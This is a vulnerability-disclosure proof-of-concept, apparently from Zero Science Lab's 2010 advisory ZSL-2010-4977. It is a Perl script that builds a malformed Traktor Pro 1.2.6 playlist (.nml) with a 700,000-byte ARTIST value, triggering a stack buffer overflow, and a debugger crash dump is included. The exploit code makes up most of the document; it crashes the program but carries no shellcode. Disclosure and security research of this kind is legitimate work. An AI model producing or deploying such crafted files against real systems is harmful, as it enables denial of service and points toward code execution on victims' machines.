Native Instruments Traktor Pro 1.2.6 Buffer Overflow

`#!/usr/local/bin/perl  
#  
#  
# Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability  
#  
#  
# Vendor: Native Instruments GmbH  
# Product web page: http://www.native-instruments.com  
# Affected version: 1.2.6.8491 (Standalone)  
#  
# Summary: TRAKTOR PRO is the new benchmark in DJ software. Mix digital files  
# on four decks, using the high-quality internal mixer or external hardware,  
# and the best effects suite around. Fully primed for professional use, TRAKTOR  
# PRO redefines the art of DJing.  
#  
# Desc: Traktor Pro suffers from a stack buffer overflow vulnerability when  
# parsing playlist files (.nml) resulting in a crash. The user input is not  
# properly sanitized which may give the attackers the possibility for an  
# arbitrary code execution on the affected system. Failure of exploitation  
# may result in a denial of service.  
#  
# Tested on: Microsoft Windows XP Professional SP3 (English)  
#  
#  
# -------------------------------------------------------------------  
#  
# (4418.4608): Stack overflow - code c00000fd (first/second chance not available)  
# eax=14250000 ebx=001cc168 ecx=00000007 edx=7c90e514 esi=001cc140 edi=001cc198  
# eip=7c90e514 esp=0ff5e4e4 ebp=0ff5e4f4 iopl=0 nv up ei pl zr na pe nc  
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246  
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -   
# ntdll!KiFastSystemCallRet:  
# 7c90e514 c3 ret  
#  
# -------------------------------------------------------------------  
#  
#  
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic  
# liquidworm gmail com  
#  
# Zero Science Lab - http://www.zeroscience.mk  
#  
# Advisory ID: ZSL-2010-4977  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4977.php  
#  
# 09.11.2010  
#  
  
  
use strict;  
  
print qq{  
  
-------------------------------------------------------------------------  
| |  
| Native Instruments Traktor 1.2.6 Stack Overflow PoC |  
| |  
| Copyleft (c) 2010, Zero Science Lab |  
| |  
-------------------------------------------------------------------------  
};  
  
my $bof = "\x41" x 700000;  
  
my $start = '<?xml version="1.0" encoding="UTF-8" standalone="no" ?>  
<NML VERSION="14"><HEAD COMPANY="www.native-instruments.com" PROGRAM="Traktor - Native Instruments"></HEAD>  
<MUSICFOLDERS></MUSICFOLDERS>  
<COLLECTION ENTRIES="2"><ENTRY MODIFIED_DATE="2008/11/18" MODIFIED_TIME="46610" AUDIO_ID="AGYAAjFQQiQFFCFAQSMVBCIwUDISBBXf/rhv/6/609/979uF//v/nD3/zf24X/+v+tPf/N/bhf/6/61Z/839uG//r/rE3/zf24b/+v+tTf/t/ahv/6/6xN/939uF//r/rUn/3f25b+/P+dTf79/Llv79/51M//38qV//3/nU3//vy5b+/v+dTf79/Llv/8/51N//39qW//3/rUz//f2pX/+/+tTP/9/blv/8/61M//782W/vv/nUz+/fy5b9/v+dTP78/alf/9/51M/v38uW/v7/rUz+/fypX//P+cS/7s/qlP/6/61L/9z+qU//r/nEv/y/6WP/x/94Ru7CEAAAAA==" TITLE="Demo 1" ARTIST="Paulseq"><LOCATION DIR="/:" FILE="Demo 1.mp3" VOLUME=""></LOCATION>  
<INFO BITRATE="193000" COVERARTID="063\5RHVNTDZ5QGUQCJSQT2SAIRKVFNA" PLAYCOUNT="6" PLAYTIME="101" RANKING="0" IMPORT_DATE="2008/11/18" LAST_PLAYED="2008/11/5" FLAGS="2" FILESIZE="2488"></INFO>  
<TEMPO BPM="126.200249" BPM_QUALITY="100"></TEMPO>  
<LOUDNESS PEAK_DB="-0.766197324" PERCEIVED_DB="0.94946605"></LOUDNESS>  
<CUE_V2 NAME="AutoGrid" DISPL_ORDER="0" TYPE="4" START="671.08913429252357" LEN="0" REPEATS="-1" HOTCUE="0"></CUE_V2>  
<CUE_V2 NAME="n.n." DISPL_ORDER="0" TYPE="5" START="66299.022459106593" LEN="1901.7395166612771" REPEATS="-1" HOTCUE="1"></CUE_V2>  
</ENTRY>  
<ENTRY MODIFIED_DATE="2008/9/9" MODIFIED_TIME="56472" AUDIO_ID="AE0AAAbzv4bJPNhuR+po5a51uDzHXUbaeMKuhYdnVl+H3Inln6bba9hvhtt55o62yWvpbnjreseflslr2G5n+4rWnobaa9duZ/tpxZ+12WzIf3fq37Wepuhs2X1n22vGnpXXa7d+Z/t71q2m+my3fWj6a8autth+6I536mu3rYXXfciPaPptxnRk+K63jWr7bbjeluietp1r+Vy3zqbmnsmve/ltp92m14/HnHvabbjehueep6x762yY7Zf4lVWcbOpup9yWx6+3z3vpXJjbh9evprx82W6o3If3r6a7fPpdiOyI6K+lzHzZXYfth+avptyIZ01BAAAAAAAAAAAAAA==" TITLE="Demo 2" ';  
  
my $traktor = "ARTIST=\"$bof\">";  
  
my $end = '<LOCATION DIR="/:" FILE="Demo 2.mp3" VOLUME=""></LOCATION>  
<INFO BITRATE="194000" COVERARTID="006\GEUNGXABSHRWRDW2UGHKAKQUYRVD" PLAYCOUNT="6" PLAYTIME="76" RANKING="0" IMPORT_DATE="2008/9/9" FILESIZE="1903"></INFO>  
<TEMPO BPM="119" BPM_QUALITY="100"></TEMPO>  
<LOUDNESS PEAK_DB="-0.257283062" PERCEIVED_DB="3.40946603"></LOUDNESS>  
<CUE_V2 NAME="AutoGrid" DISPL_ORDER="0" TYPE="4" START="797.66281512605042" LEN="0" REPEATS="-1" HOTCUE="2"></CUE_V2>  
<CUE_V2 NAME="Beginning" DISPL_ORDER="0" TYPE="0" START="797.66281512605042" LEN="0" REPEATS="-1" HOTCUE="0"></CUE_V2>  
<CUE_V2 NAME="Loop1" DISPL_ORDER="0" TYPE="5" START="41133.797268907569" LEN="2016.8067226890755" REPEATS="-1" HOTCUE="1"></CUE_V2>  
</ENTRY>  
</COLLECTION>  
<PLAYLISTS><NODE TYPE="FOLDER" NAME="$ROOT"><SUBNODES COUNT="3"><NODE TYPE="PLAYLIST" NAME="Demo Tracks"><PLAYLIST ENTRIES="2" TYPE="LIST"><ENTRY><PRIMARYKEY TYPE="TRACK" KEY="/:Demo 2.mp3"></PRIMARYKEY>  
</ENTRY>  
<ENTRY><PRIMARYKEY TYPE="TRACK" KEY="/:Demo 1.mp3"></PRIMARYKEY>  
</ENTRY>  
</PLAYLIST>  
</NODE>  
<NODE TYPE="PLAYLIST" NAME="Preparation"><PLAYLIST ENTRIES="0" TYPE="LIST"></PLAYLIST>  
</NODE>  
<NODE TYPE="PLAYLIST" NAME="_RECORDINGS"><PLAYLIST ENTRIES="0" TYPE="LIST"></PLAYLIST>  
</NODE>  
</SUBNODES>  
</NODE>  
</PLAYLISTS>  
</NML>';  
  
my $file = "PoC.nml";  
print "\n\n[*] Creating $file playlist file...\n";  
open nml, ">./$file" || die "\nCan't open $file: $!";  
print nml $start.$traktor.$end;  
print "\n[.] File successfully buffered!\n\n";  
close nml;  
`